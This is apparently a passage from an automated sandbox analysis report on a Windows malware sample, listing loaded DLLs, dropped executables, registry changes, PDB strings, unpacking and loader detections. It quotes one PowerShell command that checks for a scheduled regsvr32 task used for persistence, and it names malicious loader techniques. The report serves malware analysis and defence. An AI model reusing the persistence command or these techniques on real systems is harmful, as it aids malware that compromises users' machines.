                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: shfolder.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: shfolder.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: dwmapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: explorerframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: sfc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpSection loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: avicap32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeSection loaded: msvfw32.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpWindow found: window name: TMainForm
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Livid Pocket_is1
                          Source: file.exeStatic file information: File size 3198976 > 1048576
                          Source: file.exeStatic PE information: Raw size of mrenudwa is bigger than: 0x100000 < 0x2a1200
                          Source: Binary string: Qzqfjz.pdb source: Ele.exe, 00000015.00000002.3080168462.000000001BF00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdbMhgh Yh_CorExeMainmscoree.dll source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.55.dr
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e44fda3216.exe, 0000000B.00000003.2733601051.0000000007CD0000.00000004.00001000.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3327334251.0000000005BA2000.00000040.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdb source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: protobuf-net.pdb source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: db3cab6cee.exe, 00000037.00000003.2710982962.000001E194DF4000.00000004.00000020.00020000.00000000.sdmp, db3cab6cee.exe, 00000037.00000002.3303641960.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000000.2700074672.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000003.2707112122.000001E1964A4000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: zjFtdxQ.tmp, 0000000D.00000003.2408195203.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000003.2412265695.0000000003508000.00000004.00001000.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 5.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeUnpacked PE file: 11.2.e44fda3216.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ulxuyjiv:EW;scqvijkn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ulxuyjiv:EW;scqvijkn:EW;.taggant:EW;
                          .NET source code contains potential unpacker
                          Source: NzL6O1Q[1].exe.5.dr, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: NzL6O1Q.exe.5.dr, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: NzL6O1Q.exe.20.dr, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: NzL6O1Q.exe0.20.dr, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                          Suspicious powershell command line found
                          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Yara detected Costura Assembly Loader
                          Source: Yara matchFile source: 21.2.Ele.exe.1315ae50.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.Ele.exe.de0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000015.00000002.2849008746.0000000000DE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.2971352807.00000000130D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Ele.exe PID: 8032, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Ele.exe PID: 3408, type: MEMORYSTR
                          Source: 9LbUK15[1].exe.5.drStatic PE information: 0xFFABC69F [Sat Dec 5 09:13:03 2105 UTC]
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4046953
                          Source: random[1].exe1.5.drStatic PE information: real checksum: 0x1c80b5 should be: 0x1d5655
                          Source: 9LbUK15[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9919
                          Source: NzL6O1Q[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x769ab
                          Source: NzL6O1Q.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x769ab
                          Source: NzL6O1Q.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x769ab
                          Source: pcqxl.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x287d50
                          Source: zjFtdxQ.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x1a5444
                          Source: Ele.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x94c7d
                          Source: _setup64.tmp.13.drStatic PE information: real checksum: 0x0 should be: 0x8546
                          Source: zjFtdxQ.tmp.14.drStatic PE information: real checksum: 0x0 should be: 0x122532
                          Source: is-4SN19.tmp.15.drStatic PE information: real checksum: 0x0 should be: 0x12afba
                          Source: zjFtdxQ.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0x122532
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x311dd2 should be: 0x31967b
                          Source: random[2].exe.5.drStatic PE information: real checksum: 0x445f84 should be: 0x441356
                          Source: _isdecmp.dll.15.drStatic PE information: real checksum: 0x0 should be: 0x5528
                          Source: 9LbUK15.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9919
                          Source: e44fda3216.exe.5.drStatic PE information: real checksum: 0x1c80b5 should be: 0x1d5655
                          Source: 718e743381.exe.5.drStatic PE information: real checksum: 0x1ec5d8 should be: 0x1f0384
                          Source: zjFtdxQ[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x1a5444
                          Source: random[1].exe.5.drStatic PE information: real checksum: 0x1ec5d8 should be: 0x1f0384
                          Source: _isdecmp.dll.13.drStatic PE information: real checksum: 0x0 should be: 0x5528
                          Source: bed2608720.exe.5.drStatic PE information: real checksum: 0xb4cee should be: 0x1bb421
                          Source: _setup64.tmp.15.drStatic PE information: real checksum: 0x0 should be: 0x8546
                          Source: NzL6O1Q.exe0.20.drStatic PE information: real checksum: 0x0 should be: 0x769ab
                          Source: file.exeStatic PE information: real checksum: 0x311dd2 should be: 0x31967b
                          Source: is-VSE52.tmp.15.drStatic PE information: real checksum: 0x1f4ede should be: 0x1f2d68
                          Source: random[1].exe0.5.drStatic PE information: real checksum: 0xb4cee should be: 0x1bb421
                          Source: 739ad26354.exe.5.drStatic PE information: real checksum: 0x445f84 should be: 0x441356
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: mrenudwa
                          Source: file.exeStatic PE information: section name: qxwztaye
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: mrenudwa
                          Source: skotes.exe.0.drStatic PE information: section name: qxwztaye
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: random[1].exe.5.drStatic PE information: section name: .idata
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: random[1].exe.5.drStatic PE information: section name: irrkukjx
                          Source: random[1].exe.5.drStatic PE information: section name: tvxezsde
                          Source: random[1].exe.5.drStatic PE information: section name: .taggant
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name: .idata
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name: irrkukjx
                          Source: 718e743381.exe.5.drStatic PE information: section name: tvxezsde
                          Source: 718e743381.exe.5.drStatic PE information: section name: .taggant
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: .idata
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: hasiulpx
                          Source: random[2].exe.5.drStatic PE information: section name: eqgokjfj
                          Source: random[2].exe.5.drStatic PE information: section name: .taggant
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name: .idata
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name: hasiulpx
                          Source: 739ad26354.exe.5.drStatic PE information: section name: eqgokjfj
                          Source: 739ad26354.exe.5.drStatic PE information: section name: .taggant
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name: .idata
                          Source: random[1].exe1.5.drStatic PE information: section name:
